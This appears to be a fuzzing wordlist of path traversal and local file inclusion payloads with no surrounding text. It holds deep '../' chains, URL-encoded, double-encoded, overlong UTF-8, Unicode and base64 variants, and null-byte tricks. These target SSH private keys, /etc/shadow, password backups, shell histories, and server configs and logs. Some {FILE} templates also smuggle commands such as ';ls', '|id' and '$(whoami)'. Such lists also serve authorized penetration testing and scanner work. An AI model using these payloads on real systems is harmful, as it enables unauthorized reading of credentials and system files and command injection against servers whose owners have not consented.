../../../../../../../../../../../../../../home/user/.bash_history
../../../../../../../../../../../../../../home/user/.mysql_history
../../../../../../../../../../../../../../var/spool/cron/crontabs/root
../../../../../../../../../../../../../../var/spool/cron/root
../../../../../../../../../../../../../../etc/cron.d
../../../../../../../../../../../../../../etc/cron.daily
../../../../../../../../../../../../../../etc/cron.hourly
../../../../../../../../../../../../../../etc/cron.monthly
../../../../../../../../../../../../../../etc/cron.weekly
../../../../../../../../../../../../../../var/log/wtmp
../../../../../../../../../../../../../../var/log/btmp
../../../../../../../../../../../../../../var/log/lastlog
../../../../../../../../../../../../../../var/log/faillog
../../../../../../../../../../../../../../var/run/utmp
../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf
../../../../../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../../../../../opt/lampp/logs/access_log
../../../../../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../../../../../etc/php.ini
../../../../../../../../../../../../../../etc/php/php.ini
../../../../../../../../../../../../../../usr/lib/php.ini
../../../../../../../../../../../../../../usr/lib/php/php.ini
../../../../../../../../../../../../../../usr/local/etc/php.ini
../../../../../../../../../../../../../../usr/local/lib/php.ini
../../../../../../../../../../../../../../usr/local/php/lib/php.ini
../../../../../../../../../../../../../../usr/local/php/etc/php.ini
../../../../../../../../../../../../../../etc/php5/apache2/php.ini
../../../../../../../../../../../../../../etc/php/7.0/apache2/php.ini
../../../../../../../../../../../../../../etc/php/7.4/apache2/php.ini
../../../../../../../../../../../../../../var/lib/mysql/my.cnf
../../../../../../../../../../../../../../etc/my.cnf
../../../../../../../../../../../../../../etc/mysql/my.conf
../../../../../../../../../../../../../../usr/local/etc/my.cnf
../../../../../../../../../../../../../../usr/bin/mysql/my.cnf
../../../../../../../../../../../../../../usr/local/mysql/my.cnf
../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log
../../../../../../../../../../../../../../var/log/mysql/mysql.log
../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log
../../../../../../../../../../../../../../var/log/mysql-slow.log
../../../../../../../../../../../../../../var/log/mysql.log
../../../../../../../../../../../../../../var/log/mariadb/mariadb.log
../../../../../../../../../../../../../../var/log/postgresql/postgresql.log
../../../../../../../../../../../../../../var/lib/pgsql/data/postgresql.conf
../../../../../../../../../../../../../../etc/postgresql/postgresql.conf
../../../../../../../../../../../../../../root/.ssh/id_dsa.pub
../../../../../../../../../../../../../../root/.ssh/id_ecdsa
../../../../../../../../../../../../../../root/.ssh/id_ecdsa.pub
../../../../../../../../../../../../../../root/.ssh/id_ed25519
../../../../../../../../../../../../../../root/.ssh/id_ed25519.pub
../../../../../../../../../../../../../../home/user/.ssh/id_dsa
../../../../../../../../../../../../../../home/user/.ssh/id_dsa.pub
../../../../../../../../../../../../../../home/user/.ssh/id_ecdsa
../../../../../../../../../../../../../../home/user/.ssh/id_ecdsa.pub
../../../../../../../../../../../../../../home/user/.ssh/id_ed25519
../../../../../../../../../../../../../../home/user/.ssh/id_ed25519.pub
../../../../../../../../../../../../../../home/user/.ssh/known_hosts
../../../../../../../../../../../../../../opt/lampp/etc/httpd.conf
../../../../../../../../../../../../../../usr/local/apache2/conf/extra/httpd-ssl.conf
../../../../../../../../../../../../../../etc/apache2/sites-enabled/000-default.conf
../../../../../../../../../../../../../../etc/apache2/sites-available/default
../../../../../../../../../../../../../../etc/nginx/sites-enabled/default
../../../../../../../../../../../../../../etc/nginx/sites-available/default.conf
../../../../../../../../../../../../../../usr/local/nginx/conf/nginx.conf
../../../../../../../../../../../../../../var/log/nginx/access.log
../../../../../../../../../../../../../../var/log/nginx/error.log
../../../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../../../var/log/error_log
../../../../../../../../../../../../../../var/log/apache-access.log
../../../../../../../../../../../../../../var/log/apache-error.log
../../../../../../../../../../../../../../etc/profile
../../../../../../../../../../../../../../etc/bashrc
../../../../../../../../../../../../../../etc/bash.bashrc
../../../../../../../../../../../../../../etc/shadow-
../../../../../../../../../../../../../../etc/passwd-
../../../../../../../../../../../../../../etc/group-
../../../../../../../../../../../../../../etc/gshadow
../../../../../../../../../../../../../../var/backups/passwd.bak
../../../../../../../../../../../../../../var/backups/shadow.bak
../../../../../../../../../../../../../../var/backups/group.bak
../{FILE}
{FILE}
../../../../{FILE}
../../../../../{FILE}
..\..\{FILE}
..\..\..\{FILE}
../.../.././../{FILE}
%2e%2e%2f{FILE}
%252e%252e%252f{FILE}
%c0%ae%c0%ae%c0%af{FILE}
..;/{FILE}
....//..{FILE}
/./{FILE}
{FILE}%00
{FILE}%00.jpg
../{FILE}%00
/var/www/html/{FILE}
/var/www/{FILE}
/usr/share/nginx/html/{FILE}
C:\inetpub\wwwroot\{FILE}
C:/inetpub/wwwroot/{FILE}
../../{FILE}
../../../{FILE}
../../../../{FILE}
../../{FILE}%00
{FILE};ls
{FILE}|id
{FILE}`whoami`
{FILE}$(whoami)
{FILE}&&id
{FILE}||id
../../{FILE}?
../../{FILE}#
../../{FILE}.
../../{FILE}/
../../{FILE}//
../../{FILE}%20
../../{FILE}%09
../../{FILE}%0a
../../{FILE}%0d
../../{FILE}%00%00
url:{FILE}
file://{FILE}
jar:file://{FILE}
..;/{FILE};/..;/
/(S(X))/{FILE}
/(A(; ))/{FILE}
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%0a/bin/cat%20/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini
%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0
%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be
-/etc/pure-ftpd.conf
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini
../../../administrator/inbox
../../../conf/server.xml
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..\../..\../..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
/../../../../../../../../../../../boot.ini
/../../../../../../../../bin/id|
/../../../../pswd
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././boot.ini
/./././././././././././etc/passwd
/./././././././././././etc/shadow
/.Xauthority
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
/.bash_history
/.bash_profile
/.bashrc
/.cshrc
/.forward
/.htpasswd
/.logout
/.netrc
/.profile
/.rhosts
/.sh_history
/.shosts
/.ssh/authorized_keys
///////../../../etc/passwd
/C:/inetpub/ftproot/
/C:\Program Files\
/C:\Windows\win.ini
/D:\Program Files\
/NetServer\bin\stable\apache\php.ini
/PHP\php.ini
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/WINDOWS\php.ini
/WINNT\php.ini
/admin/access_log
/admin/install.php
/apache/logs/access.log
/apache/logs/access_log
/apache/logs/error.log
/apache/logs/error_log
/apache2/logs/access.log
/apache2/logs/access_log
/apache2/logs/error.log
/apache2/logs/error_log
/apache\php\php.ini
/bin/php.ini
/boot/grub/grub.conf
/c:\AppServ\MySQL
/c:\apache\logs\access.log
/c:\apache\logs\error.log
/c:\inetpub\wwwroot\index.asp
/config.asp
/config.js
/core/config.php
/d:\AppServ\MySQL
/d:\System32\Inetsrv\metabase.xml
/data.php
/database.asp
/database.js
/database.php
/db.php
/dbase.php
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/apt/sources.list
/etc/chrootUsers
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/default/passwd
/etc/defaultdomain
/etc/defaultrouter
/etc/ftpchroot
/etc/ftphosts
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.ce1
/etc/hostname.ce2
/etc/hostname.ce3
/etc/hostname.dcelx0
/etc/hostname.dcelx1
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/etc/httpd/php.ini
/etc/inetd.conf
/etc/init.d/apache
/etc/init.d/apache2
/etc/logrotate.d/ftp
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/master.passwd
/etc/netconfig
/etc/nsswitch.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/etc/passwd%00
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysql.ini
/etc/php.d/mysqli.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/postfix/mydomains
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/release
/etc/rpc
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/etc/syslog.conf
/etc/syslogd.conf
/etc/system
/etc/updatedb.conf
/etc/utmp
/etc/vfstab
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/home2\bin\stable\apache\php.ini
/home\bin\stable\apache\php.ini
/log/miscDir/accesslog
/master.passwd
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/php/php.ini
/php4\php.ini
/php5\php.ini
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/proc/cpuinfo
/proc/interrupts
/proc/loadavg
/proc/meminfo
/proc/mounts
/proc/net/dev
/proc/partitions
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/3
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/root/.bash_logut
/root/.ksh_history
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/Zend/etc/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache2/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/SYSLOG
/var/adm/X0msgs
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/log/xferlog
/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mlocate/mlocate.db
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/POPlog
/var/log/access.log
/var/log/acct
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth
/var/log/authlog
/var/log/boot.log
/var/log/cron.log
/var/log/dmesg
/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_mainlog
/var/log/exim_paniclog
/var/log/exim_rejectlog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftplog
/var/log/httpd/
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqld.log
/var/log/mysqlderror.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pureftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/smtpd
/var/log/spooler
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/httpd.pid
/var/run/mysqld/mysqld.pid
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/cron/crontabs/root
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/html/.htaccess
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
/var/www/sitename/htdocs/
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/web/conf/php.ini
/www/logs/proftpd.system.log
/xampp\apache\bin\php.ini
C:/wamp/logs/access.log
C:\wamp\logs\access.log
L21hc3Rlci5wYXNzd2Q=
L2V0Yy9tYXN0ZXIucGFzc3dk
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
